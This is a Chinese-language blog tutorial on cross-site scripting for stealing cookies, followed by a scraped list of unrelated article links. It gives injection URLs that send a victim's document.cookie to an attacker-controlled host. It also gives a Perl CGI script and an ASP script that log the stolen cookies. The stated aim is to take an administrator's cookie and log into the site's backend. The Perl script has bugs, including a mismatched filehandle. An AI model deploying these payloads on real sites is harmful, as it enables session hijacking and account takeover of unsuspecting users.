XSS,现在都成热门词了,跨来跨去都是alert,无聊~~     其实alert()不能排除是一种检测方式,很实用,呵呵。跨站跨到Cookies才是正道,如果网站系统有Cookie欺骗漏洞的话那就非常妙了,直接跨到管理员的Cookie一下子就能登陆后台,拿到权限比较爽。

虚构测试URL:http://hi.baidu.com/biweilun/cgi-bin/Articles.cgi?ID=<script>alert('biweilun')</script>

如果这样能弹出一个框框的话,那么你就可以利用了。

经常看到别人在网上放出收取Cookie的PHP脚本,貌似CGI脚本的没什么写?今天biweilun放出来一个,方便用于国外的XSS漏洞使用:

构造evilURL为:

http://hi.baidu.com/biweilun/cgi-bin/Articles.cgi?ID=<script>document.location='http://www.biweilun.cn/cgi-bin/cookie_catch.cgi?'+document.cookie</script>

www.biweilun.cn为你自己的虚拟主机空间,cookie_catch脚本代码如下:

#!/usr/bin/perl
# cookie_catch.cgi
# http://hi.baidu.com/biweilun
#

$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info = ~s/%([a-fA-F0-9]{2})/pack("C", hex($1))/eg;

open(COOKIE_handle, ">>cookielog") || die "Can't write in\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(COOKIE_handle);

ASP版的Cookie截取代码为Cookie.asp:

<%
testfile=Server.MapPath("cookie.txt")
msg=Request("m")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
将提交上来的m变量存在cookie.txt里,用get方式提交就行了。
然后我们在网页里嵌入

<script>document.location='http://www.xxx.com/cookie.asp?m='+document.cookie</script>,用户浏览该帖子不会有任何反应就把cookie提交到我们的asp空间了

CGI脚本跨站截取Cookie/附ASP的版本相关推荐

  1. xss漏洞-DVWA跨站攻击盗取用户cookie值

    程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style ...

  2. CORS跨域携带Cookie

    遇到的问题: 某个老系统使用Vue+Axios+PHP开发,本身是部署在同一域名下 这时候不会涉及到跨域问题 但是奈何线上服务器带宽不够用,且JS.CSS.图片等静态资源加载很缓慢 只能把静态资源迁移 ...

  3. 在 Asp.Net Core WebAPI 中防御跨站请求伪造攻击

    什么是跨站请求伪造 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或 ...

  4. 跨站式SQL脚本注入的技巧介绍

    跨站式脚本注入的好用方法,总共分三节: 第一节.SQL注入的一般步骤 首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了. 其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类 ...

  5. ASP.NET Core 防止跨站请求伪造(XSRF\/CSRF)攻击

    什么是反伪造攻击? 跨站点请求伪造(也称为XSRF或CSRF,发音为see-surf)是对Web托管应用程序的攻击,因为恶意网站可能会影响客户端浏览器和浏览器信任网站之间的交互.这种攻击是完全有可能的 ...

  6. CSRF 跨站请求伪造 为什么b网站请求a网站的地址能带上a网站的cookie

    知道csrf后的问题:CSRF 跨站请求伪造 为什么b网站请求a网站的地址能带上a网站的cookie 答:script.image.iframe的src都不受同源策略的影响.

  7. [原创]快钱99bill网站安全性测试漏洞之“跨站式脚本注入”

    [原创]快钱99bill网站安全性测试漏洞之"跨站式脚本注入" 网站安全性测试,尤为重要,电子支付网站更是如此,本文作者以实例介绍了 (1)"Yeepay网站安全测试漏洞 ...

  8. CSRF(Cross-site request forgery)跨站请求伪造

    为什么80%的码农都做不了架构师?>>>    CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2 ...

  9. url存在宽字节跨站漏洞_5分钟速览丨常见的Web安全漏洞及测试方法

    中秋小长假 "余额"就剩半天了 尽管心里有太多不舍 也要调整自己 毕竟假期都是短暂的 工作才是职场人生的常态 为了尽快消除"假日综合症" e小安贴心送上小文一篇 ...

最新文章

  1. WinAPI: CreateFontIndirect - 根据字体结构建立逻辑字体
  2. 制作win2000能用的 schtasks.exe
  3. Mysql 的使用方式,挺全的够用了
  4. linux sshd服务是什么意思,Linux中sshd命令起什么作用呢?
  5. html input得到内容,js获得html中的input标签内容
  6. mysql aa复制_MySQL主从复制实现
  7. 一段典型的PHP程序都包含那些内容呢?
  8. 小手工纸盒机器人_亲子手工 | DIY弹珠迷宫小黑手自制玩具系列
  9. linux英文安装教程图解,Linux安装中英文对照小手册
  10. 企业级 SpringBoot 教程 (八)springboot整合mongodb
  11. ATT CFO将于6月告退 公司审计官接任
  12. Splunk lookup 实践
  13. openssl版本升级
  14. 微信小程序画布实现星星闪烁
  15. MySQL-索引及其原理
  16. 安全合规/GDPR--23--研究:GDPR风险评估与组织架构保障
  17. 如何轻松搞定各种图形化展现
  18. Mysql索引命中级别
  19. [JVM]了断局:字节码执行引擎
  20. 1948-2006:哈佛大学地理系的灭亡与地理学的重生

热门文章

  1. 图论 —— 二分图 —— KM 算法
  2. 训练日志 2019.2.14
  3. 【模板】快速排序(洛谷-P1177)
  4. 信息学奥赛一本通C++语言——1083:计算星期几
  5. 信息学奥赛C++语言:格莱尔的香蕉
  6. python3 random模块_Python3 中 random模块
  7. MATLAB中disp的用法
  8. java静默安装_jdk silent install - JDK的静默安装
  9. OpenGL画坐标轴指示图
  10. numpy 数组访问方式_索引、切片、迭代